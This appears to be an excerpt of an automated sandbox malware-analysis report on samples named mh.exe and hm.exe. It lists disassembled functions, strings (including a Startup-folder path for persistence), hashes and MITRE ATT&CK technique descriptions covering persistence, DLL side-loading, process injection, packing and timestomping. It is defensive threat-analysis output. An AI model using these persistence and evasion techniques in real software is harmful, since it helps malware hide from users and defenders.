GetLastError.KERNEL32(?,?,?,00007FF741EC7F28,?,?,?,00007FF741EC9D35), ref: 00007FF741ECD44A
SetLastError.KERNEL32(?,?,?,00007FF741EC7F28,?,?,?,00007FF741EC9D35), ref: 00007FF741ECD4B2
SetLastError.KERNEL32(?,?,?,00007FF741EC7F28,?,?,?,00007FF741EC9D35), ref: 00007FF741ECD4C8
abort.LIBCMT ref: 00007FF741ECD4CE

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: ErrorLast$abort
String ID:
API String ID: 1447195878-0
Opcode ID: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
Instruction ID: aaabddb2ff03db654028b3607fc09bd8c5d5b99402e8942cd12e249afbf95f77
Opcode Fuzzy Hash: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
Instruction Fuzzy Hash: 8001AD1CA0C327C2FB1A77216D451B8D1A27F44792F844438DA2E427E6FEADF801D260

Function 00007FF741EB8590 Relevance: 6.0, APIs: 4, Instructions: 21COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF741EB8598
GetDeviceCaps.GDI32 ref: 00007FF741EB85AE
GetDeviceCaps.GDI32 ref: 00007FF741EB85C2
ReleaseDC.USER32 ref: 00007FF741EB85D3

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
Instruction ID: 5fa972a06c0e9288c655fe239ee4ed270ba11fd77149c61e48ca94c2f3fe8d42
Opcode Fuzzy Hash: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
Instruction Fuzzy Hash: 07E0ED68F0D612D2FF0A7B716859536A191BF48B43FC94439CC1E46350ED7CA0958720

Function 00007FF741E9E34C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9E549

Strings

DXGIDebug.dll, xrefs: 00007FF741E9E35A

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: DXGIDebug.dll
API String ID: 3668304517-540382549
Opcode ID: 2b89549b7426e50bfd34945384ed8c0e8b0bf6c6c1231d7991053c614d04a2bf
Instruction ID: 85042c5b808fdb0e31143aa1a39c9bedb69e716135848dc888a4c2e0e8e17f4f
Opcode Fuzzy Hash: 2b89549b7426e50bfd34945384ed8c0e8b0bf6c6c1231d7991053c614d04a2bf
Instruction Fuzzy Hash: F7719B76A18B91C6EB15FB25E8403ADB3A4FB547D4F844225DBAC07B99DFB8E051C310

Function 00007FF741ECE1F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF741ECE237

Strings

e+000, xrefs: 00007FF741ECE2DF
gfff, xrefs: 00007FF741ECE362

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: e+000$gfff
API String ID: 3215553584-3030954782
Opcode ID: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
Instruction ID: 8fefe82afe84f98db43dd6756bf6e1d0742e9322f4aa4aff66297a3849c56ac5
Opcode Fuzzy Hash: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
Instruction Fuzzy Hash: 51515866B1C7D186E726BB399C4136DAF92B781B90F888231CA9C47BC5EF6CE440C710

Function 00007FF741EA9408 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF741EA95A8: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF741EA95E6

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA959C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA95A2

Strings

SIZE, xrefs: 00007FF741EA9443

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$swprintf
String ID: SIZE
API String ID: 449872665-3243624926
Opcode ID: 1ee6a6b9fbbd6c3126f8bc5ffec1b6aa008f2877db1f13591811bbd6ed408201
Instruction ID: 5539f8cd157c86e16cbf27d41e61d23b8fa0cf9e363dfe77d579b644683e388f
Opcode Fuzzy Hash: 1ee6a6b9fbbd6c3126f8bc5ffec1b6aa008f2877db1f13591811bbd6ed408201
Instruction Fuzzy Hash: D741A366A1C652C5EB12FB64E4413BDA350FF85791F904231EBAD066D6EFBCD540C720

Function 00007FF741ECC2C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF741ECC2EA
GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FF741EC2CD5), ref: 00007FF741ECC30B

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe, xrefs: 00007FF741ECC2F9

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: FileModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe
API String ID: 3307058713-1822913178
Opcode ID: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
Instruction ID: 3c3a8aaac1979429e307ae70c12605536f5d76d2f4e9ff1b14b5466e4fbccde0
Opcode Fuzzy Hash: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
Instruction Fuzzy Hash: 8F41903AA0CA62C6EB16BF26A8401BCA794FB44785BC54036EE4D47B45EFBDE441C760

Function 00007FF741EB9B40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF741E9255C: GetDlgItem.USER32 ref: 00007FF741E925AC
Part of subcall function 00007FF741E9255C: SetWindowTextW.USER32 ref: 00007FF741E925C8

EndDialog.USER32 ref: 00007FF741EB9C24
SetDlgItemTextW.USER32 ref: 00007FF741EB9CAA

Strings

ASKNEXTVOL, xrefs: 00007FF741EB9B72

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
Instruction ID: ca8735d65cfd89d702a0ffbbd55782c51fb4e1195d15d6c30357f228bdbd9bba
Opcode Fuzzy Hash: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
Instruction Fuzzy Hash: FD41B16AA0C662C1FB16FB15E4802B9A790BF86BC2FD40135DE4D07796DFBDE4418760

Function 00007FF741EA9638 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

_snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF741EA96EA

Part of subcall function 00007FF741EB0F68: WideCharToMultiByte.KERNEL32 ref: 00007FF741EB0F99

Strings

$%s, xrefs: 00007FF741EA96D7
@%s, xrefs: 00007FF741EA96CE

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: ByteCharMultiWide_snwprintf
String ID: $%s$@%s
API String ID: 2650857296-834177443
Opcode ID: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
Instruction ID: 101cdc79381612b6ac02df30a5882f3fb4d7384e44af1ae92cad083c9cb83f9b
Opcode Fuzzy Hash: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
Instruction Fuzzy Hash: D031C17AB1CA66C5EB12BF66E4407E9A7A0BB847C5F800032EE0C07795EE7CE505C720

Function 00007FF741ECEB04 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF741ECEB76
GetFileType.KERNEL32 ref: 00007FF741ECEB8C

Strings

@, xrefs: 00007FF741ECEBB7

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: FileHandleType
String ID: @
API String ID: 3000768030-2766056989
Opcode ID: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
Instruction ID: 5e6cb3795d613debe9ed886cb6cfaf945217e5a800e441f6988ec4b2fee50c8d
Opcode Fuzzy Hash: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
Instruction Fuzzy Hash: A2219326B0C6A2C1EB71BB24D890178AA51FB45B75F680335D66F067D8EFB8D881C330

Function 00007FF741EC4078 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF741EC1D3E), ref: 00007FF741EC40BC
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF741EC1D3E), ref: 00007FF741EC4102

Strings

csm, xrefs: 00007FF741EC40EF

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
Instruction ID: 542ad1f3c99c48c5ec9334fbc67d288e7a0377d8d79cfec840017797ea440a41
Opcode Fuzzy Hash: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
Instruction Fuzzy Hash: 8A113D3660CB5182EB21BB15E840269B7E1FB88B95F584231DF8D07768EF7CD555C700

Function 00007FF741EAEA5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF741EAE95F,?,?,?,00007FF741EA463A,?,?,?), ref: 00007FF741EAEA63
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF741EAE95F,?,?,?,00007FF741EA463A,?,?,?), ref: 00007FF741EAEA6E

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00007FF741EAEA78

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: ErrorLastObjectSingleWait
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1211598281-2248577382
Opcode ID: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
Instruction ID: 7653d7d00401a472e302d1cd9aadb91faa6abd76ec961e5316a9de7083308add
Opcode Fuzzy Hash: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
Instruction Fuzzy Hash: 47E01A6DE1D823D1F702B7219C42978A2117FA17B2FD84330D53E411E1AEACA94A8321

Function 00007FF741EAA43C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF741EAA447
FindResourceW.KERNEL32 ref: 00007FF741EAA45D

Strings

RTL, xrefs: 00007FF741EAA453

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
Instruction ID: e982d869076c0f57025fdfa0477fa408d7fcb973b1f5c71d58118a4c742a1fea
Opcode Fuzzy Hash: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
Instruction Fuzzy Hash: B3D01255F0D613C1FF1A7771644573452906B18B42F884038C91D06390DEAC9489C760

Analysis Process: hm.exePID: 5788, Parent PID: 1596COMMON

Non-executed Functions

Function 00977FF0 Relevance: 7.6, APIs: 5, Instructions: 56timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00978035
GetCurrentProcessId.KERNEL32 ref: 00978040
GetCurrentThreadId.KERNEL32 ref: 00978049
GetTickCount.KERNEL32 ref: 00978051
QueryPerformanceCounter.KERNEL32 ref: 0097805E

Memory Dump Source

Source File: 0000000A.00000002.3334129054.0000000000761000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00760000, based on PE: true

Associated: 0000000A.00000002.3334105901.0000000000760000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3334257775.000000000097A000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3334257775.0000000000998000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3334295359.0000000000999000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3334407699.0000000000BA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3334422702.0000000000BA1000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3334436911.0000000000BA2000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3334451164.0000000000BA5000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_760000_hm.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: cd4e50871ce1b84376be2397e3deaae051754c4662a572f4309cc6364f0aff0f
Instruction ID: f43ad0897e9643a093712d1330d2c0248d816a36e399aef2dad969e6077020fd
Opcode Fuzzy Hash: cd4e50871ce1b84376be2397e3deaae051754c4662a572f4309cc6364f0aff0f
Instruction Fuzzy Hash: F8118C66756B1086FB504B29FC1835AB260B74A7F0F084A399E9C42BA4EF3CC48AC300

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

